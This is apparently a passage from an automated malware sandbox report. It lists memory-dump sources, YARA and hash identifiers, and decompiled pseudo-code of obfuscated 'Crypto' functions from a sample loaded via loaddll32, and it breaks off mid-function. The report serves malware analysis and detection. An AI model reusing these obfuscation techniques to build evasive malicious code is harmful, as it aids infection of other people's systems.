                                                                                                          0x02af4e99
                                                                                                          0x02af4e9f
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02af4ea5
                                                                                                          0x02af4ea7
                                                                                                          0x00000000
                                                                                                          0x02af4f17
                                                                                                          0x02af4f17
                                                                                                          0x02af4f17
                                                                                                          0x00000000

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: *-$&6!$*d>$6&Y$7$]MH[
                                                                                                          • API String ID: 0-1885758756
                                                                                                          • Opcode ID: 933a1ed2204874364cda5f64de7d13d051fc5aa4e8381b76f0db461af5e8cdd3
                                                                                                          • Instruction ID: a479b48fe04293831db1caa90a3f0e782bace922630ca5b13674ea716081a210
                                                                                                          • Opcode Fuzzy Hash: 933a1ed2204874364cda5f64de7d13d051fc5aa4e8381b76f0db461af5e8cdd3
                                                                                                          • Instruction Fuzzy Hash: 58D132B15083809FD758CF65C58941BFBF1FBD8758F208A1DF2968A260D7B58949CF42
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AFCCD9, Relevance: 7.7, Strings: 6, Instructions: 227COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 99%
                                                                                                          			E02AFCCD9(void* __ecx, void* __edx) {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				void* _t242;
				intOrPtr _t243;
				intOrPtr _t244;
				void* _t248;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				void* _t282;
				void* _t283;
				signed int _t285;
				signed int* _t287;
				signed int* _t288;

				_t287 =  &_v100;
				_v4 = _v4 & 0x00000000;
				_v8 = 0x71e8b0;
				_v36 = 0x18cf5b;
				_v36 = _v36 + 0x6698;
				_v36 = _v36 ^ 0x001a117a;
				_v60 = 0xa2890;
				_t282 = __edx;
				_t248 = __ecx;
				_t283 = 0x72ed85;
				_t250 = 0x42;
				_v60 = _v60 / _t250;
				_v60 = _v60 ^ 0xe73bacde;
				_v60 = _v60 ^ 0xe73fbe74;
				_v40 = 0x9c8291;
				_t251 = 0x70;
				_v40 = _v40 / _t251;
				_v40 = _v40 ^ 0x000cc374;
				_v64 = 0xa8df6e;
				_t252 = 0x66;
				_v64 = _v64 * 0x5a;
				_v64 = _v64 | 0x6df616d5;
				_v64 = _v64 ^ 0x7ff9e958;
				_v88 = 0xc174cb;
				_v88 = _v88 ^ 0xe7b64a13;
				_v88 = _v88 ^ 0xc84137a7;
				_v88 = _v88 << 0xc;
				_v88 = _v88 ^ 0x60915aca;
				_v32 = 0x752193;
				_v32 = _v32 * 0x3f;
				_v32 = _v32 ^ 0x1cda7702;
				_v92 = 0x141833;
				_v92 = _v92 + 0xffffc8f8;
				_v92 = _v92 + 0xf362;
				_v92 = _v92 << 0x10;
				_v92 = _v92 ^ 0xd48431d2;
				_v96 = 0xc34044;
				_v96 = _v96 << 8;
				_v96 = _v96 + 0xffff536d;
				_v96 = _v96 + 0x5d23;
				_v96 = _v96 ^ 0xc334c852;
				_v20 = 0x3a6348;
				_v20 = _v20 << 0x10;
				_v20 = _v20 ^ 0x6343ca6d;
				_v56 = 0x49cd71;
				_v56 = _v56 ^ 0x72d9145f;
				_v56 = _v56 + 0x4f98;
				_v56 = _v56 ^ 0x7290366b;
				_v24 = 0x3bf83a;
				_v24 = _v24 << 9;
				_v24 = _v24 ^ 0x77f6a760;
				_v28 = 0x632842;
				_v28 = _v28 + 0xffffe69b;
				_v28 = _v28 ^ 0x006ee443;
				_v48 = 0x4b2ed5;
				_v48 = _v48 ^ 0x82c7a85b;
				_v48 = _v48 + 0xffff7c4b;
				_v48 = _v48 ^ 0x8282f052;
				_v52 = 0x4c7b52;
				_v52 = _v52 + 0xffffbc1f;
				_v52 = _v52 + 0x2e12;
				_v52 = _v52 ^ 0x004752b1;
				_v16 = 0x3a13fc;
				_v16 = _v16 / _t252;
				_v16 = _v16 ^ 0x00081e0d;
				_v84 = 0x8573c6;
				_t253 = 0x4b;
				_v84 = _v84 / _t253;
				_v84 = _v84 | 0x42242f90;
				_v84 = _v84 >> 0xc;
				_v84 = _v84 ^ 0x00008b33;
				_v100 = 0x3509ce;
				_t254 = 0x19;
				_v100 = _v100 / _t254;
				_t285 = 0x44;
				_t255 = 0x6f;
				_v100 = _v100 * 0x31;
				_v100 = _v100 + 0x6b64;
				_v100 = _v100 ^ 0x006714bf;
				_v68 = 0x65eeb7;
				_v68 = _v68 + 0x24bd;
				_v68 = _v68 << 7;
				_v68 = _v68 ^ 0x330bb4b3;
				_v72 = 0x31388d;
				_v72 = _v72 * 0x77;
				_v72 = _v72 / _t285;
				_v72 = _v72 ^ 0x00560572;
				_v76 = 0x10ecc2;
				_v76 = _v76 | 0x28471304;
				_v76 = _v76 + 0xcdda;
				_v76 = _v76 ^ 0x285661a5;
				_v44 = 0xf32c83;
				_v44 = _v44 / _t255;
				_v44 = _v44 / _t285;
				_v44 = _v44 ^ 0x000ff213;
				_v80 = 0xb9f4a0;
				_v80 = _v80 << 0xa;
				_v80 = _v80 + 0xd38f;
				_v80 = _v80 >> 8;
				_v80 = _v80 ^ 0x00ede5ae;
				_v12 = 0x138f30;
				_v12 = _v12 ^ 0xf49e1969;
				_v12 = _v12 ^ 0xf48aec3a;
				while(1) {
					L1:
					_t242 = 0xd8fe181;
					do {
						L2:
						while(_t283 != 0x72ed85) {
							if(_t283 == 0xb6c7232) {
								_t278 = _v52;
								_t255 = _v48;
								_t243 = E02B01005(_v48, _v52, _v16, _v84,  *((intOrPtr*)(_t282 + 0x38)));
								_t287 =  &(_t287[3]);
								 *((intOrPtr*)(_t282 + 0x2c)) = _t243;
								__eflags = _t243;
								_t242 = 0xd8fe181;
								_t283 =  !=  ? 0xd8fe181 : 0xd6f812a;
								continue;
							}
							if(_t283 == 0xc5020c9) {
								_push(_v64);
								_t244 = E02B03263(_v36, _v60, __eflags, _t248, _v40, _t255);
								_t288 =  &(_t287[4]);
								 *((intOrPtr*)(_t282 + 0x38)) = _t244;
								__eflags = _t244;
								if(_t244 != 0) {
									E02B0148A(_t244, _t244, _v88, _v32, _v92, _v96);
									_t278 = _v56;
									_t255 = _v20;
									E02AEE2BD(_v56, _v24,  *((intOrPtr*)(_t282 + 0x38)), _v28);
									_t287 =  &(_t288[7]);
									_t283 = 0xb6c7232;
									goto L1;
								}
							} else {
								if(_t283 == 0xd6f812a) {
									return E02AEF0E9(_v44,  *((intOrPtr*)(_t282 + 0x38)), _v80, _v12);
								}
								if(_t283 != _t242) {
									goto L13;
								} else {
									_t244 = E02AF0EBC(_v100, _t278, _v68, _v100, _v72, _v76, _v100, _t255, _t282, E02B025F1);
									_t287 =  &(_t287[8]);
									 *((intOrPtr*)(_t282 + 0x48)) = _t244;
									if(_t244 == 0) {
										_t283 = 0xd6f812a;
										while(1) {
											L1:
											_t242 = 0xd8fe181;
											goto L2;
										}
									}
								}
							}
							return _t244;
						}
						_t283 = 0xc5020c9;
						L13:
						__eflags = _t283 - 0x11d9bb5;
					} while (__eflags != 0);
					return _t242;
				}
			}










































                                                                                                          0x02afccd9
                                                                                                          0x02afccdc
                                                                                                          0x02afcce1
                                                                                                          0x02afcce9
                                                                                                          0x02afccf1
                                                                                                          0x02afccf9
                                                                                                          0x02afcd01
                                                                                                          0x02afcd11
                                                                                                          0x02afcd13
                                                                                                          0x02afcd19
                                                                                                          0x02afcd1e
                                                                                                          0x02afcd23
                                                                                                          0x02afcd29
                                                                                                          0x02afcd31
                                                                                                          0x02afcd39
                                                                                                          0x02afcd45
                                                                                                          0x02afcd4a
                                                                                                          0x02afcd50
                                                                                                          0x02afcd58
                                                                                                          0x02afcd65
                                                                                                          0x02afcd66
                                                                                                          0x02afcd6a
                                                                                                          0x02afcd72
                                                                                                          0x02afcd7a
                                                                                                          0x02afcd82
                                                                                                          0x02afcd8a
                                                                                                          0x02afcd92
                                                                                                          0x02afcd97
                                                                                                          0x02afcd9f
                                                                                                          0x02afcdac
                                                                                                          0x02afcdb0
                                                                                                          0x02afcdb8
                                                                                                          0x02afcdc0
                                                                                                          0x02afcdc8
                                                                                                          0x02afcdd0
                                                                                                          0x02afcdd5
                                                                                                          0x02afcddd
                                                                                                          0x02afcde5
                                                                                                          0x02afcdea
                                                                                                          0x02afcdf2
                                                                                                          0x02afcdfa
                                                                                                          0x02afce02
                                                                                                          0x02afce0a
                                                                                                          0x02afce0f
                                                                                                          0x02afce17
                                                                                                          0x02afce1f
                                                                                                          0x02afce27
                                                                                                          0x02afce2f
                                                                                                          0x02afce37
                                                                                                          0x02afce3f
                                                                                                          0x02afce44
                                                                                                          0x02afce4c
                                                                                                          0x02afce54
                                                                                                          0x02afce5c
                                                                                                          0x02afce64
                                                                                                          0x02afce6c
                                                                                                          0x02afce74
                                                                                                          0x02afce7c
                                                                                                          0x02afce84
                                                                                                          0x02afce8c
                                                                                                          0x02afce94
                                                                                                          0x02afce9c
                                                                                                          0x02afcea4
                                                                                                          0x02afceb2
                                                                                                          0x02afceb6
                                                                                                          0x02afcec0
                                                                                                          0x02afcece
                                                                                                          0x02afced3
                                                                                                          0x02afced7
                                                                                                          0x02afcedf
                                                                                                          0x02afcee4
                                                                                                          0x02afceec
                                                                                                          0x02afcefa
                                                                                                          0x02afceff
                                                                                                          0x02afcf0a
                                                                                                          0x02afcf0d
                                                                                                          0x02afcf0e
                                                                                                          0x02afcf12
                                                                                                          0x02afcf1a
                                                                                                          0x02afcf22
                                                                                                          0x02afcf2a
                                                                                                          0x02afcf32
                                                                                                          0x02afcf37
                                                                                                          0x02afcf3f
                                                                                                          0x02afcf4c
                                                                                                          0x02afcf58
                                                                                                          0x02afcf5c
                                                                                                          0x02afcf64
                                                                                                          0x02afcf6c
                                                                                                          0x02afcf74
                                                                                                          0x02afcf7c
                                                                                                          0x02afcf84
                                                                                                          0x02afcf94
                                                                                                          0x02afcfa3
                                                                                                          0x02afcfa7
                                                                                                          0x02afcfaf
                                                                                                          0x02afcfb7
                                                                                                          0x02afcfbc
                                                                                                          0x02afcfc4
                                                                                                          0x02afcfc9
                                                                                                          0x02afcfd1
                                                                                                          0x02afcfd9
                                                                                                          0x02afcfe1
                                                                                                          0x02afcfe9
                                                                                                          0x02afcfe9
                                                                                                          0x02afcfe9
                                                                                                          0x02afcfee
                                                                                                          0x00000000
                                                                                                          0x02afcfee
                                                                                                          0x02afd000
                                                                                                          0x02afd0bc
                                                                                                          0x02afd0c0
                                                                                                          0x02afd0c4
                                                                                                          0x02afd0c9
                                                                                                          0x02afd0cc
                                                                                                          0x02afd0cf
                                                                                                          0x02afd0d3
                                                                                                          0x02afd0d8
                                                                                                          0x00000000
                                                                                                          0x02afd0d8
                                                                                                          0x02afd00c
                                                                                                          0x02afd04e
                                                                                                          0x02afd060
                                                                                                          0x02afd065
                                                                                                          0x02afd068
                                                                                                          0x02afd06b
                                                                                                          0x02afd06d
                                                                                                          0x02afd087
                                                                                                          0x02afd097
                                                                                                          0x02afd09b
                                                                                                          0x02afd09f
                                                                                                          0x02afd0a4
                                                                                                          0x02afd0a7
                                                                                                          0x00000000
                                                                                                          0x02afd0a7
                                                                                                          0x02afd00e
                                                                                                          0x02afd010
                                                                                                          0x00000000
                                                                                                          0x02afd108
                                                                                                          0x02afd018
                                                                                                          0x00000000
                                                                                                          0x02afd01e
                                                                                                          0x02afd037
                                                                                                          0x02afd03c
                                                                                                          0x02afd03f
                                                                                                          0x02afd044
                                                                                                          0x02afd04a
                                                                                                          0x02afcfe9
                                                                                                          0x02afcfe9
                                                                                                          0x02afcfe9
                                                                                                          0x00000000
                                                                                                          0x02afcfe9
                                                                                                          0x02afcfe9
                                                                                                          0x02afd044
                                                                                                          0x02afd018
                                                                                                          0x02afd110
                                                                                                          0x02afd110
                                                                                                          0x02afd0e0
                                                                                                          0x02afd0e5
                                                                                                          0x02afd0e5
                                                                                                          0x02afd0e5
                                                                                                          0x00000000
                                                                                                          0x02afcfee

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: #]$$P$Cn$Hc:$R{L$dk
                                                                                                          • API String ID: 0-1551317889
                                                                                                          • Opcode ID: daafbd8832c061257f7c8250320d42da9d9fc0c4761ad2e995ce69bbdf463a65
                                                                                                          • Instruction ID: 26b76474f3a0c6e694f8f252338d50272a0b83ef38450738b41d36e62fdfed94
                                                                                                          • Opcode Fuzzy Hash: daafbd8832c061257f7c8250320d42da9d9fc0c4761ad2e995ce69bbdf463a65
                                                                                                          • Instruction Fuzzy Hash: 8AB152B25083419FD398CF65C58940BFBE2FBC8748F008A1DF69996260D7B5C949CF86
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AEF369, Relevance: 7.7, Strings: 6, Instructions: 211COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 93%
                                                                                                          			E02AEF369(void* __ecx) {
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				unsigned int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* _t198;
				void* _t199;
				void* _t202;
				void* _t207;
				void* _t210;
				void* _t213;
				void* _t214;
				void* _t216;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				void* _t241;
				signed int* _t243;
				void* _t246;

				_t243 =  &_v88;
				_v16 = 0x3949c2;
				asm("stosd");
				_t214 = __ecx;
				_t241 = 0;
				_t216 = 0x68b8c0f;
				asm("stosd");
				asm("stosd");
				_v76 = 0x201aab;
				_t234 = 0x76;
				_v76 = _v76 / _t234;
				_v76 = _v76 + 0xe408;
				_t235 = 0xc;
				_v76 = _v76 * 0x38;
				_v76 = _v76 ^ 0x004fdd99;
				_v44 = 0xd502f1;
				_v44 = _v44 | 0x910f8184;
				_v44 = _v44 / _t235;
				_v44 = _v44 ^ 0x0c2ba140;
				_v48 = 0xe41bd4;
				_v48 = _v48 ^ 0x89eac382;
				_t236 = 0x67;
				_v48 = _v48 / _t236;
				_v48 = _v48 ^ 0x015e526e;
				_v24 = 0xf49d06;
				_v24 = _v24 | 0x486b4754;
				_v24 = _v24 ^ 0x48f37dd9;
				_v88 = 0xd25a8e;
				_v88 = _v88 ^ 0x0de03e2c;
				_v88 = _v88 >> 8;
				_t237 = 0x57;
				_v88 = _v88 / _t237;
				_v88 = _v88 ^ 0x00057327;
				_v32 = 0x480afd;
				_v32 = _v32 ^ 0x00453f61;
				_v60 = 0x165baf;
				_v60 = _v60 << 0xa;
				_v60 = _v60 ^ 0xd8cf9c31;
				_v60 = _v60 ^ 0x81a5172b;
				_v84 = 0x2fcd58;
				_v84 = _v84 + 0x335f;
				_v84 = _v84 + 0xffff6358;
				_v84 = _v84 << 9;
				_v84 = _v84 ^ 0x5ec42bb0;
				_v40 = 0xbc2783;
				_v40 = _v40 + 0xffff2ae1;
				_t238 = 0xa;
				_v40 = _v40 * 0x5e;
				_v40 = _v40 ^ 0x44c8bdaa;
				_v72 = 0xc9404f;
				_v72 = _v72 | 0xfaaf7fa5;
				_v72 = _v72 / _t238;
				_v72 = _v72 >> 0xc;
				_v72 = _v72 ^ 0x000be8dc;
				_v56 = 0xcb8585;
				_v56 = _v56 >> 6;
				_v56 = _v56 ^ 0xa4d175a3;
				_v56 = _v56 ^ 0xa4d4e9a5;
				_v28 = 0xfbd7ad;
				_v28 = _v28 + 0xffffc7a7;
				_v28 = _v28 ^ 0x00f429b0;
				_v80 = 0x6cf7c4;
				_v80 = _v80 << 0xb;
				_v80 = _v80 ^ 0xc9851cf7;
				_v80 = _v80 + 0xe116;
				_v80 = _v80 ^ 0xae3f2149;
				_v52 = 0xd995b1;
				_v52 = _v52 + 0x112b;
				_v52 = _v52 + 0xffff70e0;
				_v52 = _v52 ^ 0x00d4086e;
				_v64 = 0x3e6f55;
				_v64 = _v64 ^ 0x64233eb3;
				_v64 = _v64 + 0xfffff8c9;
				_v64 = _v64 + 0xffffb5e5;
				_v64 = _v64 ^ 0x64179829;
				_v68 = 0x30eb6c;
				_t239 = 0x37;
				_v68 = _v68 / _t239;
				_v68 = _v68 + 0xffffeee1;
				_v68 = _v68 >> 0xa;
				_v68 = _v68 ^ 0x000816d3;
				_v20 = 0x71a516;
				_v20 = _v20 | 0x2f4429e5;
				_v20 = _v20 ^ 0x2f784372;
				_v36 = 0xda1832;
				_v36 = _v36 * 0x4c;
				_v36 = _v36 + 0xffff5a89;
				_v36 = _v36 ^ 0x40b976b8;
				goto L1;
				do {
					while(1) {
						L1:
						_t246 = _t216 - 0x68b8c0f;
						if(_t246 > 0) {
							break;
						}
						if(_t246 == 0) {
							_t216 = 0xe6264d6;
							continue;
						} else {
							if(_t216 == 0x8a1c17) {
								_push(_t216);
								_t202 = E02AF07F0();
								_t243 =  &(_t243[1]);
								_t216 = 0xf218af8;
								_t241 = _t241 + _t202;
								continue;
							} else {
								if(_t216 == 0x50fe579) {
									_t241 = _t241 + E02AFBE8C(_t214 + 0x2c, _v64, _v68, _v20, _v36);
								} else {
									if(_t216 == 0x530d654) {
										_push(_t216);
										_t207 = E02AF07F0();
										_t243 =  &(_t243[1]);
										_t216 = 0x8a5806a;
										_t241 = _t241 + _t207;
										continue;
									} else {
										if(_t216 != 0x5e83455) {
											goto L17;
										} else {
											_push(_t216);
											_t210 = E02AF07F0();
											_t243 =  &(_t243[1]);
											_t216 = 0x530d654;
											_t241 = _t241 + _t210;
											continue;
										}
									}
								}
							}
						}
						L20:
						return _t241;
					}
					if(_t216 == 0x8a5806a) {
						_push(_t216);
						_t198 = E02AF07F0();
						_t243 =  &(_t243[1]);
						_t216 = 0x8a1c17;
						_t241 = _t241 + _t198;
						goto L17;
					} else {
						if(_t216 == 0xe6264d6) {
							_t199 = E02AFBE8C(_t214 + 0x4c, _v76, _v44, _v48, _v24);
							_t243 =  &(_t243[3]);
							_t216 = 0x5e83455;
							_t241 = _t241 + _t199;
							goto L1;
						} else {
							if(_t216 != 0xf218af8) {
								goto L17;
							} else {
								_push(_t216);
								_t213 = E02AF07F0();
								_t243 =  &(_t243[1]);
								_t216 = 0x50fe579;
								_t241 = _t241 + _t213;
								goto L1;
							}
						}
					}
					goto L20;
					L17:
				} while (_t216 != 0x3fc4e73);
				goto L20;
			}








































                                                                                                          0x02aef369
                                                                                                          0x02aef36c
                                                                                                          0x02aef380
                                                                                                          0x02aef388
                                                                                                          0x02aef38a
                                                                                                          0x02aef38c
                                                                                                          0x02aef38e
                                                                                                          0x02aef38f
                                                                                                          0x02aef390
                                                                                                          0x02aef39c
                                                                                                          0x02aef3a1
                                                                                                          0x02aef3a7
                                                                                                          0x02aef3b4
                                                                                                          0x02aef3b7
                                                                                                          0x02aef3bb
                                                                                                          0x02aef3c3
                                                                                                          0x02aef3cb
                                                                                                          0x02aef3db
                                                                                                          0x02aef3df
                                                                                                          0x02aef3e7
                                                                                                          0x02aef3ef
                                                                                                          0x02aef3fb
                                                                                                          0x02aef400
                                                                                                          0x02aef406
                                                                                                          0x02aef40e
                                                                                                          0x02aef416
                                                                                                          0x02aef41e
                                                                                                          0x02aef426
                                                                                                          0x02aef42e
                                                                                                          0x02aef436
                                                                                                          0x02aef43f
                                                                                                          0x02aef444
                                                                                                          0x02aef44a
                                                                                                          0x02aef452
                                                                                                          0x02aef462
                                                                                                          0x02aef46a
                                                                                                          0x02aef472
                                                                                                          0x02aef477
                                                                                                          0x02aef47f
                                                                                                          0x02aef487
                                                                                                          0x02aef48f
                                                                                                          0x02aef497
                                                                                                          0x02aef49f
                                                                                                          0x02aef4a4
                                                                                                          0x02aef4ac
                                                                                                          0x02aef4b4
                                                                                                          0x02aef4c1
                                                                                                          0x02aef4c2
                                                                                                          0x02aef4c6
                                                                                                          0x02aef4ce
                                                                                                          0x02aef4d6
                                                                                                          0x02aef4e4
                                                                                                          0x02aef4ea
                                                                                                          0x02aef4ef
                                                                                                          0x02aef4f7
                                                                                                          0x02aef4ff
                                                                                                          0x02aef504
                                                                                                          0x02aef50c
                                                                                                          0x02aef514
                                                                                                          0x02aef51c
                                                                                                          0x02aef524
                                                                                                          0x02aef52c
                                                                                                          0x02aef534
                                                                                                          0x02aef539
                                                                                                          0x02aef541
                                                                                                          0x02aef549
                                                                                                          0x02aef551
                                                                                                          0x02aef559
                                                                                                          0x02aef561
                                                                                                          0x02aef569
                                                                                                          0x02aef571
                                                                                                          0x02aef579
                                                                                                          0x02aef581
                                                                                                          0x02aef589
                                                                                                          0x02aef591
                                                                                                          0x02aef599
                                                                                                          0x02aef5a7
                                                                                                          0x02aef5af
                                                                                                          0x02aef5b3
                                                                                                          0x02aef5bb
                                                                                                          0x02aef5c0
                                                                                                          0x02aef5c8
                                                                                                          0x02aef5d0
                                                                                                          0x02aef5d8
                                                                                                          0x02aef5e0
                                                                                                          0x02aef5ed
                                                                                                          0x02aef5f1
                                                                                                          0x02aef5f9
                                                                                                          0x02aef5f9
                                                                                                          0x02aef601
                                                                                                          0x02aef601
                                                                                                          0x02aef601
                                                                                                          0x02aef601
                                                                                                          0x02aef603
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02aef605
                                                                                                          0x02aef67d
                                                                                                          0x00000000
                                                                                                          0x02aef607
                                                                                                          0x02aef60d
                                                                                                          0x02aef66b
                                                                                                          0x02aef66c
                                                                                                          0x02aef671
                                                                                                          0x02aef674
                                                                                                          0x02aef679
                                                                                                          0x00000000
                                                                                                          0x02aef60f
                                                                                                          0x02aef615
                                                                                                          0x02aef71a
                                                                                                          0x02aef61b
                                                                                                          0x02aef621
                                                                                                          0x02aef651
                                                                                                          0x02aef652
                                                                                                          0x02aef657
                                                                                                          0x02aef65a
                                                                                                          0x02aef65f
                                                                                                          0x00000000
                                                                                                          0x02aef623
                                                                                                          0x02aef629
                                                                                                          0x00000000
                                                                                                          0x02aef62f
                                                                                                          0x02aef637
                                                                                                          0x02aef638
                                                                                                          0x02aef63d
                                                                                                          0x02aef640
                                                                                                          0x02aef645
                                                                                                          0x00000000
                                                                                                          0x02aef645
                                                                                                          0x02aef629
                                                                                                          0x02aef621
                                                                                                          0x02aef615
                                                                                                          0x02aef60d
                                                                                                          0x02aef71d
                                                                                                          0x02aef725
                                                                                                          0x02aef725
                                                                                                          0x02aef687
                                                                                                          0x02aef6e1
                                                                                                          0x02aef6e2
                                                                                                          0x02aef6e7
                                                                                                          0x02aef6ea
                                                                                                          0x02aef6ef
                                                                                                          0x00000000
                                                                                                          0x02aef689
                                                                                                          0x02aef68b
                                                                                                          0x02aef6c5
                                                                                                          0x02aef6ca
                                                                                                          0x02aef6cd
                                                                                                          0x02aef6d2
                                                                                                          0x00000000
                                                                                                          0x02aef68d
                                                                                                          0x02aef693
                                                                                                          0x00000000
                                                                                                          0x02aef695
                                                                                                          0x02aef69d
                                                                                                          0x02aef69e
                                                                                                          0x02aef6a3
                                                                                                          0x02aef6a6
                                                                                                          0x02aef6ab
                                                                                                          0x00000000
                                                                                                          0x02aef6ab
                                                                                                          0x02aef693
                                                                                                          0x02aef68b
                                                                                                          0x00000000
                                                                                                          0x02aef6f1
                                                                                                          0x02aef6f1
                                                                                                          0x00000000

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ,>$Uo>$_3$a?E$l0$rCx/
                                                                                                          • API String ID: 0-1805074986
                                                                                                          • Opcode ID: aee53d98fdbd87342a85eaa3d07f56d671f8fcd94221aca7db3dcd7928f6070b
                                                                                                          • Instruction ID: 8761f1fa7bcca83ba9004caa159abad4fbf1fca82a727f8c0aabe08ea2ab091a
                                                                                                          • Opcode Fuzzy Hash: aee53d98fdbd87342a85eaa3d07f56d671f8fcd94221aca7db3dcd7928f6070b
                                                                                                          • Instruction Fuzzy Hash: 659145B25083809FC768CF25D98940FBBF1FBD5748F144A2DF68696260D7B6C9098F42
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AF8806, Relevance: 7.7, Strings: 6, Instructions: 201COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 96%
                                                                                                          			E02AF8806(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				void* _t156;
				void* _t172;
				void* _t174;
				void* _t177;
				void* _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				void* _t189;
				intOrPtr _t216;
				signed int* _t219;

				_t215 = _a8;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02AFFE29(_t156);
				_v76 = 0x923182;
				_t219 =  &(( &_v140)[4]);
				_v72 = 0xa31cb9;
				_t216 = 0;
				_v68 = 0;
				_v64 = 0;
				_t189 = 0xe0c62fa;
				_v120 = 0x4473bb;
				_t183 = 0x46;
				_v120 = _v120 / _t183;
				_v120 = _v120 << 6;
				_v120 = _v120 ^ 0x003879f9;
				_v100 = 0x40bbdb;
				_t184 = 0x64;
				_v100 = _v100 * 0x13;
				_v100 = _v100 ^ 0x04c6e1a5;
				_v140 = 0x8d0a20;
				_v140 = _v140 * 0x6a;
				_v140 = _v140 + 0x25b5;
				_v140 = _v140 * 0x47;
				_v140 = _v140 ^ 0x32607187;
				_v84 = 0x381a9b;
				_v84 = _v84 + 0xbdad;
				_v84 = _v84 ^ 0x00352eaa;
				_v124 = 0x2aec69;
				_v124 = _v124 | 0x10e7a47b;
				_v124 = _v124 ^ 0x113e433b;
				_v124 = _v124 / _t184;
				_v124 = _v124 ^ 0x000f1a56;
				_v80 = 0x7d6845;
				_v80 = _v80 + 0xffff13df;
				_v80 = _v80 ^ 0x0079135d;
				_v92 = 0x295f3e;
				_v92 = _v92 + 0xbf8d;
				_v92 = _v92 ^ 0x0026878e;
				_v116 = 0x37f4f;
				_v116 = _v116 << 6;
				_v116 = _v116 + 0x3a5c;
				_v116 = _v116 ^ 0x00effc52;
				_v132 = 0xa2ba8e;
				_v132 = _v132 + 0x1d0a;
				_v132 = _v132 | 0x3462f83d;
				_t185 = 0x33;
				_v132 = _v132 * 0x30;
				_v132 = _v132 ^ 0xea8b61c3;
				_v128 = 0xc1a215;
				_v128 = _v128 / _t185;
				_v128 = _v128 | 0x8f52208d;
				_v128 = _v128 + 0x2564;
				_v128 = _v128 ^ 0x8f53844f;
				_v108 = 0x49ebcc;
				_v108 = _v108 * 0x2a;
				_v108 = _v108 ^ 0x0c2cea59;
				_v136 = 0x4a157a;
				_t186 = 0x59;
				_v136 = _v136 / _t186;
				_v136 = _v136 >> 1;
				_v136 = _v136 << 9;
				_v136 = _v136 ^ 0x00dde8e3;
				_v96 = 0x85f352;
				_v96 = _v96 | 0xf8883f30;
				_v96 = _v96 ^ 0xf88ae245;
				_v104 = 0xc8529d;
				_v104 = _v104 >> 8;
				_v104 = _v104 ^ 0x00006ec5;
				_v88 = 0xa01b;
				_v88 = _v88 + 0xf4b;
				_v88 = _v88 ^ 0x0002d8bd;
				_v112 = 0x376510;
				_v112 = _v112 >> 1;
				_v112 = _v112 + 0x6895;
				_v112 = _v112 ^ 0x001ca4c8;
				do {
					while(_t189 != 0x2d570bf) {
						if(_t189 == 0x2e69388) {
